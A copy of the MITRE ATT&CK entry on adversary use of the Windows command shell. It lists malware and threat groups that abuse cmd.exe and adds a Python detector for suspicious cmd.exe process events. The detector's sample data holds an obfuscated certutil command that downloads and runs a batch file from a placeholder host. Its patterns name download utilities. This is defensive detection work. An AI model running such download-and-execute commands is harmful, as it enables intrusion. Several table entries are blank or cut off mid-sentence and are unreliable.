Command and Scripting Interpreter: Windows Command Shell
Other sub-techniques of Command and Scripting Interpreter (7)
ID | Name |
---|---|
T1059.001 | PowerShell |
T1059.002 | AppleScript |
T1059.003 | Windows Command Shell |
T1059.004 | Unix Shell |
T1059.005 | Visual Basic |
T1059.006 | Python |
T1059.007 | JavaScript/JScript |
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.
Procedure Examples
Name | Description |
---|---|
4H RAT | |
ABK | ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.[155] |
adbupd | |
admin@338 | Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.[166] |
ADVSTORESHELL | ADVSTORESHELL can create a remote shell and run a given command.[22][23] |
APT1 | APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution.[53] |
APT18 | APT18 uses cmd.exe to execute commands on the victim’s machine.[192][193] |
APT28 | An APT28 loader Trojan uses a cmd.exe and batch script to run its payload.[189] The group has also used macros to execute payloads.[73][190][191] |
APT3 | An APT3 downloader uses the Windows command |
APT32 | |
APT37 | |
APT38 | APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.[188] |
APT39 | APT39 utilized custom scripts to perform internal reconnaissance.[196] |
APT41 | APT41 used |
Astaroth | |
AuditCred | AuditCred can open a reverse shell on the system to execute commands.[50] |
BabyShark | |
BackConfig | BackConfig can download and run batch files to execute commands on a compromised host.[157] |
BACKSPACE | Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.[29] |
BADNEWS | BADNEWS is capable of executing commands via cmd.exe.[69][70] |
Bandook | |
Bankshot | Bankshot uses the command-line interface to execute arbitrary commands.[51][52] |
BBK | BBK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.[155] |
BISCUIT | BISCUIT has a command to launch a command shell on the system.[74] |
Bisonal | Bisonal can launch cmd.exe to execute commands on the system.[65] |
BLACKCOFFEE | BLACKCOFFEE has the capability to create a reverse shell.[36] |
Blue Mockingbird | Blue Mockingbird has used batch script files to automate execution and deployment of payloads.[219] |
BONDUPDATER | BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.[103] |
BRONZE BUTLER | BRONZE BUTLER has used batch scripts and the command-line interface for execution.[80] |
CALENDAR | CALENDAR has a command to run cmd.exe to execute commands.[74] |
Carbanak | |
Cardinal RAT | Cardinal RAT can execute commands.[25] |
CARROTBAT | CARROTBAT has the ability to execute command line arguments on a compromised host.[154] |
China Chopper | China Chopper's server component is capable of opening a command terminal.[16][17][18] |
cmd | cmd is used to execute programs and other actions at the command-line interface.[2] |
Cobalt Group | Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.[205] The group has used an exploit toolkit known as Threadkit that launches .bat files.[206][207][208][205][209][210] |
Cobalt Strike | Cobalt Strike uses a command-line interface to interact with systems.[1] |
Cobian RAT | Cobian RAT can launch a remote command shell interface for executing commands.[81] |
CoinTicker | CoinTicker executes a bash script to establish a reverse shell.[108] |
Comnie | |
ComRAT | |
CozyCar | A module in CozyCar allows arbitrary commands to be executed by invoking |
Dark Caracal | Dark Caracal has used macros in Word documents that would download a second stage if executed.[160] |
DarkComet | DarkComet can launch a remote shell to execute commands on the victim’s machine.[132] |
Darkhotel | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.[187] |
Daserf | |
DealersChoice | DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.[45] |
Denis | Denis can launch a remote shell to execute arbitrary commands on the victim’s machine.[136][137] |
Dipsind | |
DownPaper | |
Dragonfly 2.0 | Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.[174][175] |
Emissary | Emissary has the capability to create a remote shell and execute specified commands.[40] |
Emotet | |
Empire | |
EvilBunny | EvilBunny has an integrated scripting engine to download and execute Lua scripts.[123] |
Exaramel for Windows | Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine.[138] |
Felismus | |
FELIXROOT | FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.[94][93] |
FIN10 | FIN10 has executed malicious .bat files containing PowerShell commands.[165] |
FIN7 | FIN7 used the command prompt to launch commands on the victim’s machine.[204][118] |
FIN8 | FIN8 has used a batch file to automate frequently executed post-compromise cleanup activities.[172] FIN8 executes commands remotely via cmd.exe.[173] |
Frankenstein | Frankenstein has run a command script to set up persistence as a scheduled task named "WinUpdate", as well as other encoded commands from the command line.[218] |
Gamaredon Group | Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.[13][180] |
Gold Dragon | Gold Dragon uses cmd.exe to execute commands for discovery.[26] |
Goopy | Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.[137] |
Gorgon Group | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.[164] |
GravityRAT | GravityRAT executes commands remotely on the infected host.[12] |
GreyEnergy | GreyEnergy uses cmd.exe to execute itself in-memory.[93] |
H1N1 | |
HARDRAIN | |
HAWKBALL | HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.[119] |
hcdLoader | hcdLoader provides command-line access to the compromised system.[61] |
Helminth | Helminth can provide a remote shell. One version of Helminth uses batch scripting.[68] |
Hi-Zor | |
HiddenWasp | HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.[121] |
Hikit | Hikit has the ability to create a remote shell and run given commands.[143] |
HOMEFRY | |
Honeybee | Several commands are supported by Honeybee's implant via the command-line interface, and there is also a utility to execute any custom command on an infected endpoint.[211] Honeybee used batch scripting.[211] |
HOPLIGHT | HOPLIGHT can launch cmd.exe to execute commands on the system.[107] |
HotCroissant | HotCroissant can remotely open applications on the infected host with the |
HTTPBrowser | HTTPBrowser is capable of spawning a reverse shell on a victim.[66] |
httpclient | httpclient opens cmd.exe on the victim.[28] |
InnaputRAT | InnaputRAT launches a shell to execute commands on the victim’s machine.[47] |
InvisiMole | InvisiMole can launch a remote shell to execute commands.[91] |
Ixeshe | |
JCry | |
JHUHUGIT | |
JPIN | JPIN can use the command-line utility cacls.exe to change file permissions.[31] |
jRAT | |
Kasidet | |
Kazuar | Kazuar uses cmd.exe to execute commands on the victim’s machine.[130] |
Ke3chang | Ke3chang has used batch scripts in its malware to install persistence mechanisms.[181] |
KeyBoy | KeyBoy can launch interactive shells for communicating with the victim machine.[115][116] |
KEYMARBLE | |
Koadic | Koadic can open an interactive command shell to perform command-line functions on victim machines.[4] Koadic performs most of its operations using Windows Script Host (JScript) and runs arbitrary shellcode.[4] |
KOMPROGO | |
KONNI | KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.[54][55] |
Lazarus Group | Lazarus Group malware uses cmd.exe to execute commands on victims.[212][213][214][215] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[48] |
Leviathan | Leviathan uses a backdoor known as BADFLICK that is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML.[46][89] |
LightNeuron | LightNeuron is capable of executing commands via cmd.exe.[122] |
Linfo | Linfo creates a backdoor through which remote attackers can start a remote shell.[8] |
LoudMiner | LoudMiner used a batch script to run the Linux virtual machine as a service.[148] |
Magic Hound | Magic Hound has used the command-line interface.[163] |
MAZE | The MAZE encryption process has used batch scripts with various commands.[147] |
MechaFlounder | MechaFlounder has the ability to run commands on a compromised host.[152] |
menuPass | menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of the pentesting script wmiexec.vbs to execute commands.[169][63][170][56] menuPass has used malicious macros embedded inside Office documents to execute files.[171][56] |
Metamorfo | |
Micropsia | |
MirageFox | MirageFox has the capability to execute commands using cmd.exe.[100] |
Mis-Type | Mis-Type uses cmd.exe to run commands for enumerating the host.[14] |
Misdat | Misdat is capable of providing shell functionality to the attacker to execute commands.[14] |
Mivast | Mivast has the capability to open a remote shell and run basic commands.[9] |
MoonWind | MoonWind can execute commands via an interactive command shell.[135] MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.[135] |
More_eggs | |
Mosquito | Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.[11] |
MuddyWater | MuddyWater has used a custom tool for creating reverse shells.[182] MuddyWater has used JavaScript files to execute its POWERSTATS payload.[183][184][185][182][186] |
MURKYTOP | |
NanoCore | NanoCore can open a remote command-line interface and execute commands.[97] NanoCore uses JavaScript files.[98] |
NavRAT | NavRAT leverages cmd.exe to perform discovery techniques.[58] NavRAT loads malicious shellcode and executes it in memory.[58] |
NETEAGLE | NETEAGLE allows adversaries to execute shell commands on the infected host.[29] |
Netwalker | Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.[151] |
njRAT | njRAT can launch a command shell interface for executing commands.[113] |
OceanSalt | OceanSalt can create a reverse shell on the infected endpoint using cmd.exe.[32] OceanSalt has been executed via malicious macros.[32] |
OilRig | OilRig has used macros to deliver malware such as QUADAGENT and OopsIE.[84][216][59][35][217] OilRig has used batch scripts.[84][216][59][35][217] |
Okrum | Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.[142] |
OopsIE | OopsIE uses the command prompt to execute commands on the victim's machine.[59][60] |
Orz | Orz can execute shell commands.[46] Orz can execute commands with JavaScript.[46] |
Patchwork | Patchwork ran a reverse shell with Meterpreter.[194] Patchwork used JavaScript code and .SCT files on victim machines.[70][195] |
PHOREAL | |
Pisloader | Pisloader uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.[49] |
PLAINTEE | PLAINTEE uses cmd.exe to execute commands on the victim’s machine.[95] |
PLEAD | PLEAD has the ability to execute shell commands on the compromised host.[140] |
PlugX | PlugX allows actors to spawn a reverse shell on a victim.[66][67] |
PoisonIvy | PoisonIvy creates a backdoor through which remote attackers can open a command-line interface.[87] |
Pony | Pony has used batch scripts to delete itself after execution.[150] |
PowerDuke | PowerDuke runs |
POWRUNER | |
Proxysvc | Proxysvc executes a binary on the system and logs the results into a temp file by using: |
Pteranodon | Pteranodon can execute commands on the victim.[13] |
QUADAGENT | QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine.[35] |
QuasarRAT | QuasarRAT can launch a remote shell to execute commands on the victim’s machine.[3] |
Ragnar Locker | Ragnar Locker has used cmd.exe and batch scripts to execute commands.[159] |
Rancor | |
RATANKBA | |
RedLeaves | RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.[63][38] |
Remcos | Remcos can launch a remote command line to execute commands on the victim’s machine.[5] |
Remexi | Remexi silently executes received commands with cmd.exe.[106] |
Revenge RAT | Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.[110] |
RGDoor | RGDoor uses cmd.exe to execute commands on the victim’s machine.[75] |
Rising Sun | Rising Sun executed commands using cmd.exe.[145] |
RobbinHood | RobbinHood uses cmd.exe on the victim's computer.[124] |
RogueRobin | RogueRobin uses Windows Script Components.[43][44] |
RTM | |
RunningRAT | RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.[26] |
Ryuk | Ryuk has used |
Sakula | Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.[24] |
SamSam | SamSam uses custom batch scripts to execute some of its components.[105] |
SDBot | SDBot has the ability to use the command shell to execute commands on a compromised host.[153] |
SeaDuke | |
Seasalt | Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.[74] |
SEASHARPEE | SEASHARPEE can execute commands on victims.[21] |
ServHelper | ServHelper can execute shell commands against cmd.[111][112] |
ShimRat | ShimRat can be issued a command shell function from the C2.[146] |
Silence | Silence has used the Windows command line to run commands.[197][198][199] |
SNUGRIDE | SNUGRIDE is capable of executing commands and spawning a reverse shell.[38] |
Soft Cell | Soft Cell used the Windows command shell to execute commands.[202] |
Sowbug | |
SQLRat | SQLRat has used SQL to execute JavaScript and VB scripts on the host system.[118] |
StreamEx | |
Suckfly | Several tools used by Suckfly have been command-line driven.[179] |
SYSCON | SYSCON has the ability to execute commands through cmd on a compromised host.[154] |
TA505 | |
TDTESS | |
TEXTMATE | TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.[33][34] |
Threat Group-1314 | Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.[176] |
Threat Group-3390 | Threat Group-3390 has used command-line interfaces for execution.[16][178] |
TinyZBot | |
TrickBot | TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.[104] |
Tropic Trooper | Tropic Trooper has used Windows command scripts.[149] |
TSCookie | TSCookie has the ability to execute shell commands on the infected host.[141] |
Turla | Turla RPC backdoors have used cmd.exe to execute commands.[200][201] |
TURNEDUP | |
TYPEFRAME | TYPEFRAME can uninstall malware components using a batch script.[134] TYPEFRAME can execute commands using a shell.[134] |
UBoatRAT | |
Umbreon | Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.[85] |
UPPERCUT | UPPERCUT uses cmd.exe to execute commands on the victim’s machine.[56] |
USBferry | |
Volgmer | Volgmer can execute commands on the victim's machine.[41][42] |
WEBC2 | |
Wiarp | Wiarp creates a backdoor through which remote attackers can open a command-line interface.[92] |
XTunnel | |
Zebrocy | Zebrocy uses cmd.exe to execute commands on the system.[120] |
Zeus Panda | Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.[88] |
ZLib | |
zwShell | |
ZxShell | |
Mitigations
Mitigation | Description |
---|---|
Execution Prevention | Use application control where appropriate. |
Detection
Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
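The guidance above comes down to inspecting process-creation telemetry for cmd.exe and the command lines handed to it. The following is an added example and is not code from MITRE or from any of the tools catalogued above: a small Python triage routine that runs over constructed Sysmon Event ID 1 style records (ParentImage, Image, CommandLine). The parent-process list, the user-writable path patterns and the download-utility patterns are illustrative assumptions to be tuned per environment, not a vetted ruleset. One caveat it handles: cmd.exe treats an unquoted caret as an escape character, so a command line such as c^e^rtutil runs certutil; the routine undoes that escaping before matching so trivially obfuscated commands are not missed.

```python
"""Triage cmd.exe process-creation events (Sysmon Event ID 1 style).

Added example for the Detection section of T1059.003; not MITRE's code.
SUSPICIOUS_PARENTS, USER_WRITABLE and DOWNLOADERS are assumptions to be
tuned to the environment, not a vetted ruleset.
"""
from __future__ import annotations

import re

# Assumption: processes that should rarely, if ever, spawn a command shell.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",  # Office
    "w3wp.exe", "httpd.exe", "tomcat9.exe",                     # web servers
    "mshta.exe", "wscript.exe", "cscript.exe",                  # script hosts
}
# Assumption: user-writable locations from which batch files rarely run legitimately.
USER_WRITABLE = re.compile(
    r"%temp%|\\temp\\|\\appdata\\|\\downloads\\|\\public\\|\\programdata\\", re.I)
# Assumption: utilities commonly chained behind cmd.exe /c to fetch a payload.
DOWNLOADERS = re.compile(r"certutil\s+-urlcache|bitsadmin\s+/transfer|powershell.*-enc", re.I)
SWITCH_C_OR_K = re.compile(r"\s/[ck]\s", re.I)   # cmd /c or cmd /k
BATCH_FILE = re.compile(r"\.(bat|cmd)\b", re.I)


def normalize_cmdline(cmdline: str) -> str:
    """Undo cmd.exe caret escaping outside double quotes.

    cmd.exe treats ^ as an escape character, so c^e^rtutil runs certutil.
    Inside double quotes the caret is literal and is kept as-is.
    """
    out: list[str] = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmdline):      # keep the escaped character, drop the caret
                out.append(cmdline[i + 1])
                i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list[str]:
    """Return the reasons a cmd.exe process-creation event looks suspicious.

    An empty list means no heuristic fired (or the image is not cmd.exe).
    """
    if basename(event.get("Image", "")) not in {"cmd.exe", "cmd"}:
        return []
    raw = event.get("CommandLine", "")
    cmdline = normalize_cmdline(raw)
    parent = basename(event.get("ParentImage", ""))
    reasons: list[str] = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"cmd.exe spawned by {parent}")
    if cmdline != raw:
        reasons.append("caret obfuscation in command line")
    if SWITCH_C_OR_K.search(cmdline) and BATCH_FILE.search(cmdline) and USER_WRITABLE.search(cmdline):
        reasons.append("batch file executed from user-writable path")
    if DOWNLOADERS.search(cmdline):
        reasons.append("download utility chained behind cmd.exe")
    return reasons


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run analyze() over a batch of events; return (index, reasons) for each hit."""
    return [(i, r) for i, e in enumerate(events) if (r := analyze(e))]


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" '},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c c^e^rtutil -urlcache -split -f http://example.invalid/a.bat %TEMP%\a.bat && %TEMP%\a.bat"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c C:\Users\Public\update.bat"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The same fields are available from Windows Security event 4688 when the "Include command line in process creation events" policy is enabled, so the routine applies to either source once the field names are mapped. Parent-child relationships carry most of the signal here; command-line pattern matching on its own is easy to evade, which is why the example normalizes caret escaping before matching and treats each heuristic as one reason rather than a verdict.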
References
- Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.
- Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.
- MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
- Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
- Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.
- Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
- F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
- Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
- Stama, D. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.
- Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
- ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
- Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.
- Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
- US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.
- Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
- Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
- The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
- Carr, N. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
- Reynolds, J. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
- Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
- ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
- Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
- Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
- Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
- Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
- Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
- FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
- ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
- Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.
- Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
- Brumaghin, E. and Grady, C. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
- Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
- FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.
- Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.
- FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
- Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
- Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
- US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
- US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
- Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.
- Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.
- Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
- Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
- ASERT Team. (2018, April 04). Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files. Retrieved July 9, 2018.
- Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
- Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
- Trend Micro. (2018, November 20). Lazarus Continues Heists, Mounts Attacks on Financial Organizations in Latin America. Retrieved December 3, 2018.
- Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.
- US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.
- Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
- Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
- Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.
- Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
- Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.
- Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
- Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
- Carvey, H. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.
- Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
- PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
- US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
- Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
- Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
- Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
- Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.
- Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.
- Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
- Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
- Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
- Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
- Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
- Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
- Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
- ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
- Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
- Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
- Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.
- Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
- Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.
- Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
- Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
- Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
- FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
- Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
- Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
